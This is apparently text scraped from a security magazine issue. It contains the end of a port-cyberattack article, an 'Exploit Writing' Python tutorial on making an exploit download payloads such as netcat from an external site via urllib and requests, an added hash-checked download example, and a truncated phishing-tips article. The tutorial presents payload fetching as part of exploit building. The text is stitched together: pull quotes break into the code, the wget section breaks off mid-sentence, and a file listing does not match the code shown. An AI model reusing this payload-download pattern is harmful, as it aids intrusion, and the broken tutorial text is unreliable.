Ports should closely coordinate with government counterparts and industry partners on intelligence sharing and cybersecurity best practices. Cyber threats evolve so quickly, always being prepared for the latest one is a significant challenge.

For a seamless flow of goods, we need to be constantly vigilant of potential threats to our supply chain infrastructure. This latest attack is an urgent reminder that cyber resilience must be a top priority.

"Ports are difficult targets. To cause such a disruption, the attackers would have to be highly skilled and plan ahead."

This Article first appeared in The Conversation
EXPLOIT WRITING

Part 3 - Downloading files and payloads

Till now, in our Exploit Writing tutorials, you have learnt how to gather information about the operating system, how to perform various file operations and how to execute external commands from inside the exploit.

In Part 3, you will learn how to download files using your exploit. Most real-world exploits download various types of payloads, so this is high time you learn how to download files from the exploit code.

In Python, there are various modules that implement the download function. Let's see all of them. For downloading purposes, I have chosen a zip archive of netcat (download information is given in our Downloads section) hosted on an external website, although you can use any file of your choice. Just make sure to copy the URL correctly, as we need to specify it in the code of the exploit.

So, let's begin with the urllib module.

1) urllib module

We will continue from the same file, first_exploit, that we left at the end of Part 2. The editor shows only its last line, the shutil.which() call from Part 2:

    print(shutil.which("perl"))

Import the urllib module and edit the code as shown below.

"As cybersecurity leaders, we have to create our message of influence because security is a culture and you need the business to take place and be part of that security culture."
- Britney Hommerzheim
    from urllib import request

    # Zip archive of netcat for Windows, hosted on an external site; any URL works
    URL = "https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip"

    # urlretrieve() fetches the URL and saves the body under the local name given
    # as the second argument; it returns a (filename, headers) tuple
    result = request.urlretrieve(URL, "netcat.exe")

Save the changes and execute first_exploit as shown below. This downloads the netcat file into the current directory.

    $ python3 first_exploit
    $ ls
    archive.zip  copied_exploit  copied_exploit_2  first_exploit  netcat.exe
"Social engineering scams are a particular concern. With these scams, attackers present a post intended to get the target user to click on a link. That link usually leads to the user downloading some malicious code that has the potential to steal information on the user's computer or mobile device. These scams are sometimes also called phishing and baiting, as well as click-jacking. Whatever they're called, just know that not every post on social media is safe to click on. You should take special care to treat every link with suspicion, especially those that look like click bait."
- Rick Delgado
Running the file command on the download shows what was actually fetched:

    $ file netcat.exe
    netcat.exe: Zip archive data, at least v2.0 to extract, compression method=deflate

It is stored as netcat.exe because that is the name I specified for it. Note that it is still a zip archive: the local file name changes nothing about the content. You can also reach the same function by importing urllib.request directly, as shown below.
    import urllib.request

    URL = "https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip"

    # Same call as before, reached through the full module path
    result = urllib.request.urlretrieve(URL, "netcat.exe")

2) wget module

You all know wget, right? Yes, I am talking about the popular binary that is used to download files
3) requests module

The requests module (a third-party package, not part of the standard library) does the same job with a different API. The response body is available as bytes in result.content, which the code below writes to a file:

    import requests

    URL = "https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip"

    # get() returns a Response object; .content is the entire body as bytes
    result = requests.get(URL)
    result.raise_for_status()  # fail on HTTP errors rather than saving an error page to disk

    with open("netcat3.exe", "wb") as f:
        f.write(result.content)

Running it adds netcat3.exe next to the earlier downloads:

    $ ls
    archive.zip  copied_exploit  copied_exploit_2  first_exploit  netcat.exe  netcat2.exe  netcat3.exe
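Both download snippets in this part (urlretrieve and requests.get().content) write whatever the server returns straight to disk: there is no size limit, no timeout, and no check that the file is the payload the exploit author actually tested, so a swapped or truncated download would be executed as-is. The following is an added example, not code from the magazine's tutorial. It streams the body in chunks with a timeout and a size cap, verifies a SHA-256 digest before the file gets its final name, and then applies the same is-it-a-zip check that the file netcat.exe command made above. So that it runs offline, a local http.server thread serving a constructed zip stands in for the external site; the /netcat.zip path, the hash constant and the helper names are assumptions of this example.

```python
import hashlib
import http.server
import io
import tempfile
import threading
import urllib.request
import zipfile
from pathlib import Path


def build_sample_zip() -> bytes:
    """Constructed stand-in for the netcat archive (built in memory, not downloaded)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("README.txt", "sample payload built for this example\n")
    return buf.getvalue()


SAMPLE_ZIP = build_sample_zip()
SAMPLE_SHA256 = hashlib.sha256(SAMPLE_ZIP).hexdigest()  # the digest an exploit would pin


class _PayloadHandler(http.server.BaseHTTPRequestHandler):
    """Minimal loopback server standing in for the external site the tutorial uses."""

    def do_GET(self):
        if self.path != "/netcat.zip":
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "application/zip")
        self.send_header("Content-Length", str(len(SAMPLE_ZIP)))
        self.end_headers()
        self.wfile.write(SAMPLE_ZIP)

    def log_message(self, *args):  # keep the demo quiet
        pass


def serve_sample():
    """Start the stand-in server on a random loopback port; returns (server, base_url)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _PayloadHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def download(url, dest, expected_sha256, timeout=10.0, max_bytes=10_000_000):
    """Stream url into dest, rejecting oversize bodies and any SHA-256 mismatch.

    Unlike urlretrieve() or requests.get().content, the body is never held whole in
    memory, and no unverified data ever sits under the final file name.
    """
    dest = Path(dest)
    part = dest.with_name(dest.name + ".part")
    digest = hashlib.sha256()
    received = 0
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp, open(part, "wb") as out:
            while True:
                chunk = resp.read(64 * 1024)
                if not chunk:
                    break
                received += len(chunk)
                if received > max_bytes:
                    raise ValueError(f"body exceeds {max_bytes} bytes")
                digest.update(chunk)
                out.write(chunk)
        if digest.hexdigest() != expected_sha256:
            raise ValueError("SHA-256 mismatch: not the payload we expected")
    except Exception:
        part.unlink(missing_ok=True)  # no half-written or tampered file survives
        raise
    part.replace(dest)  # only a verified file gets its real name
    return dest


def demo():
    """Fetch the sample twice: once with the pinned hash, once with a wrong one."""
    srv, base = serve_sample()
    try:
        with tempfile.TemporaryDirectory() as tmp:
            good = download(base + "/netcat.zip", Path(tmp) / "netcat.exe", SAMPLE_SHA256)
            is_zip = zipfile.is_zipfile(good)  # same question `file netcat.exe` answered
            size = good.stat().st_size
            try:
                download(base + "/netcat.zip", Path(tmp) / "bad.exe", "0" * 64)
                rejected = False
            except ValueError:
                rejected = True
            files = sorted(p.name for p in Path(tmp).iterdir())
    finally:
        srv.shutdown()
        srv.server_close()
    return {"is_zip": is_zip, "size": size, "rejected": rejected, "files": files}


if __name__ == "__main__":
    print(demo())
```

The hash pin is what turns "download a file" into "download the file I tested": with it, a server that has been compromised or a mirror that serves a different build fails closed instead of handing the exploit an unknown binary. The size cap and timeout matter for the same reason the tutorial's one-liners are convenient, since a hostile server can otherwise stall the exploit or fill the disk.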

In our next issue, we will combine all the Python modules learnt in Part 1, Part 2 and Part 3 and explain how they are useful in an exploit.
ONLINE SECURITY

Phishing scams: 7 safety tips from a cybersecurity expert

Thembekile Olivia Mayayise
Senior Lecturer, University of the Witwatersrand

Recently, one of my acquaintances, Frank, received an email late on a Monday afternoon with the subject line, "Are you still in the office?" It appeared to come from his manager, who claimed to be stuck in a long meeting without the means to urgently purchase online gift vouchers for clients. He asked for help and shared a link to an online platform, from which Frank bought R6,000 (about US$325) worth of gift vouchers. Once he'd sent the codes he received a second email from the "boss" requesting one more voucher.

At that point, Frank reached out to his boss through WhatsApp and discovered he'd been duped. Frank had fallen prey to a phishing scam.

This is just one example of many from my own circles. Other friends and relatives - some of them seasoned internet users who know about the importance of cybersecurity - have also fallen prey to phishing scams.

I am a cybersecurity professional who conducts research on and teaches various cybersecurity topics. In recent years I have noticed (and confirmed through research) that some organisations and individuals seem fatigued by cybersecurity awareness efforts. Is it possible that they assume most people are technologically astute and constantly well-informed? Or could it simply be that fatigue has set in because of the demanding nature of cybersecurity awareness campaigns? Though I have no definitive answer, I suspect the latter.

The reality is that phishing scams are here to stay and the methods employed in their execution continue to evolve. Given my expertise and experience, I would like to offer seven tips to help you stay safe from phishing scams. This is especially important during the festive season as people shop for gifts and book holidays online. These activities create more opportunities for cybercriminals to net new victims. However, these tips are appropriate throughout the year. Cybercriminals don't take breaks - so you shouldn't ever drop your guard.

What is phishing?

"Phishing" is a strategy designed to deceive people into revealing sensitive information such as credit card details, login credentials and, in some instances, identification numbers.

The most common form of phishing is via email: phishers send fraudulent emails that appear to be from legitimate sources. The messages often contain links to fake websites designed to steal login credentials or other sensitive information. The same email will be sent to many addresses. Phishers can obtain email addresses from places such as corporate websites, existing data breaches, social media platforms, business cards or other publicly available company documents. Cybercriminals know that casting their net wide means they'll surely catch some.

Voice phishing (vishing) is another form of this scam. Here, perpetrators use voice communication, like a phone call in which the caller falsely claims to be a bank official and seeks to assist you in resetting your password or updating your account details. Other common vishing scams centre on offering discounts or rewards if you join a vacation club, provided you disclose your personal credit card information.

Social media phishing, meanwhile, happens when scammers create fake accounts purporting to be real people (for instance, posing as Frank's boss). They then start interacting with the real person's connections to deceive them into giving up sensitive information or performing financial favours.

Who is behind these scams? Typically, these are seasoned and cunning scammers who have honed their skills in the world of phishing over an extended period. Some work alone; others belong to syndicates.

Phishing skills

Successful phishers have a variety of skills. They combine psychological tactics and technical prowess.

They are master manipulators, playing on victims' emotions. Individuals are deceived into believing they've secured a substantial sum, often millions, through a jackpot win. This scheme falsely claims that their cellphone number or email was used for entry. Consequently, the victim doesn't seek clarification. Excited about getting the windfall payment quickly, they give their personal information to cybercriminals.

These scammers even tailor their approach to match individuals' personal beliefs. For example, if you have an affinity for ancestral worship, be prepared for a message from someone claiming to be a medium, asserting that your great-great-grandfather is requesting a money ritual involving a deposit to a particular account and promising multiplication of your funds - even though your ancestors have communicated no such information.

Likewise, if you are a devout Christian, someone claiming to be "Prophet Profit" might attempt to contact you through a messaging platform, su-
(Cont'd on next page)